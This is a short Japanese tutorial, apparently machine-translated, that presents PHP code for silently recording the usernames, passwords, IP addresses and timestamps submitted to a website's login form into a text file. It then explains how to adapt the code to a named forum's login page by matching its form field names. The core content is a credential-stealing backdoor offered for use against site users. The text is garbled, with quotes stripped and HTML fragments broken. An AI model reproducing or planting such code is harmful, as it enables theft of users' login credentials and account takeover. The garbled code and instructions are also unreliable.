バックグラウンドログインパスワードを傍受するためのPHPコード

if($_POST[loginsubmit]!=){ //ログインボタンがクリックされたかどうかを判断します
$sb=user:.$_POST[ユーザー名].--passwd:.$_POST[パスワード].--ip: . $HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // POSTで受け取った値を連結して変数に代入 $sb
fwrite(fopen(robot.txt, ab), $sb);} //結果はファイルに書き込まれます


以下は、Huaxia のログイン ページを例とした簡単な分析です。 bbs.xxx.com/login.php を開き、右クリックしてソース コードを表示し、CTRL F 検索アクションでログイン フォームを見つけます。

キーコードをコピーしただけです。

/アクションの後の値は、ログインを処理するフォーム送信のアドレスです。たとえば、パスワードが正しいかどうかを判断するメソッドは POST なので、それを受け取るには $_POST を使用します。

。 。 。 。強力な省略記号。 。 。 。 。 。


アカウント(U):

クラス=入力ID =pwuser accessKey=u size=16
name=pwuser> //ユーザー名の入力ボックス。name の値は $_POST[ と同じである必要があります。 username] に対応するため、Huaxia のパスワードを傍受するには、$_POST[pwuser]


Password (P):
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> user name については、その名前の値に注意してください。これは $_POST[username] に対応する必要があるため、Huaxia のパスワードを傍受するには、それを $_POST[pwpwd] に変更する必要があります。